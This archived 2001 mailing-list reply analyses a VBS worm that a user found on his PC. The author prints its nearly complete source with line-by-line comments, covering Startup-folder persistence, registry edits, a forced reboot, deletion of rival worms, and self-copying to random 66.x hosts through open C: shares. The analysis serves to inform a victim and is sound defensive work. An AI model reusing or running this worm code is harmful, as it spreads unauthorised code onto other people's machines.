[RC5] What is this?

Peter Corbett peter_corbett_0 at yahoo.com
Tue Sep 4 16:10:54 EDT 2001


Hi.

--- "Aaron W. Swenson" <aswenson at frontiernet.net> wrote:
> I just recently discovered this program in my start menu, not as a 
> shortcut, but the whole thing.  I don't know what it is.  And I can't find 
> where to send it to Microsoft without being CHARGED!  Any help on explaing 
> what the purpose of this script is would be wonderful considering that I 
> haven't installed anything in months.

The bad news is that it's a worm.
The good news is that it limits itself to the 66.0.0.0/8 netblock, and it
relies on the target machine having an open read/write C: drive.

Furthermore, it doesn't look like it does anything blatently destructive, as
much as any program of unknown origin that alters your files can be
non-destructive... It removes some other VBS worms, and plugs the vulnerability
of open C: shares. However, despite its good intentions, it's still a worm, and
worms are bad.

Here's what it's doing... my notes are with the //

Dim rr
set t=wscript.createobject("wscript.network")
set f=createobject("scripting.filesystemobject")
Set WshShell = WScript.CreateObject("WScript.Shell")
randomize
on error resume next
rr=WshShell.RegRead ("HKLM\Software\Microsoft\Windows\slim")
if (rr <> 1) then
Set WshShell = WScript.CreateObject("WScript.Shell")
// This is where it sets up the objects it needs to do its dirty work.

f.copyfile "c:\sys32.exe", "c:\windows\startm~1\programs\startup\"
//Here it copies a support file to the startup dir.

Call WshShell.RegWrite
("HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Network\",
0,"REG_SZ")
Call WshShell.RegWrite
("HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoFileSharing
1 ,"REG_DWORD")
Call WshShell.RegWrite

("HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoPrintSharing",
1 ,"REG_DWORD")
Call WshShell.RegWrite ("HKLM\Software\Microsoft\Windows\slim", 1 ,"REG_SZ")
Call WSHShell.Run ("%windir%\RUNDLL32.EXE shell32.dll,SHExitWindowsEx 2", 2,
false)
end if

// Here it writes to the registry.. it looks like it's disabling file
// sharing: plugging the hole it used to get in.

do
do while w=0
if (f.fileexists("c:\network.vbs")) then f.deletefile("c:\network.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\network.vbs")) then
f.deletefile("c:\windows\startm~1\programs\startup\network.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\network.exe")) then
f.deletefile("c:\windows\startm~1\programs\startup\network.exe")
if (f.fileexists("c:\windows\startm~1\programs\startup\mscfg.exe")) then
f.deletefile("c:\windows\startm~1\programs\startup\mscfg.exe")
if (f.fileexists("c:\windows\startm~1\programs\startup\mscfg.vbs")) then
f.deletefile("c:\windows\startm~1\programs\startup\mscfg.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\a.vbs")) then
f.deletefile("c:\windows\startm~1\programs\startup\a.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\a24.vbs")) then
f.deletefile("c:\windows\startm~1\programs\startup\a24.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\little.vbs")) then
f.deletefile("c:\windows\startm~1\programs\startup\little.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\prince.vbs")) then
f.deletefile("c:\windows\startm~1\programs\startup\prince.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\MS StartUp
Config.exe")) then f.deletefile("c:\windows\startm~1\programs\startup\MS
StartUp Config.exe")
if (f.fileexists("c:\windows\startm~1\programs\startup\_a.vbs")) then
f.deletefile("c:\windows\startm~1\programs\startup\_a.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\_b.vbs")) then
f.deletefile("c:\windows\startm~1\programs\startup\_b.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\_1.vbs")) then
f.deletefile("c:\windows\startm~1\programs\startup\_1.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\_chubby.vbs")) then
f.deletefile("c:\windows\startm~1\programs\startup\_chubby.vbs")

// Here it's deleteing a bunch of other viruses and stuff.
 
n="\\66."&int(254*rnd+1)&"."&int(254*rnd+1)&"."&int(254*rnd+1)&"\C"
t.mapnetworkdrive "x:",n
set o=t.enumnetworkdrives
for i=0 to o.Count-1
if n=o.item(i) then w=1
next
loop
f.copyfile "c:\windows\startm~1\programs\startup\_slim.vbs",
"x:\windows\startm~1\programs\startup\"
f.copyfile "c:\sys32.exe", "x:\"
t.removenetworkdrive "x:"
w=0
loop

// Now the worm part: concoct a UNC path \\66.random.random.random\C, and map
// X: to that. Then the scripts copies itself to the startup folder on X:, and
// unmaps X:

Peter Corbett
peter_corbett_0 at yahoo.com

__________________________________________________
Do You Yahoo!?
Get email alerts & NEW webcam video instant messaging with Yahoo! Messenger
http://im.yahoo.com
--
To unsubscribe, send 'unsubscribe rc5' to majordomo at lists.distributed.net
rc5-digest subscribers replace rc5 with rc5-digest



More information about the rc5 mailing list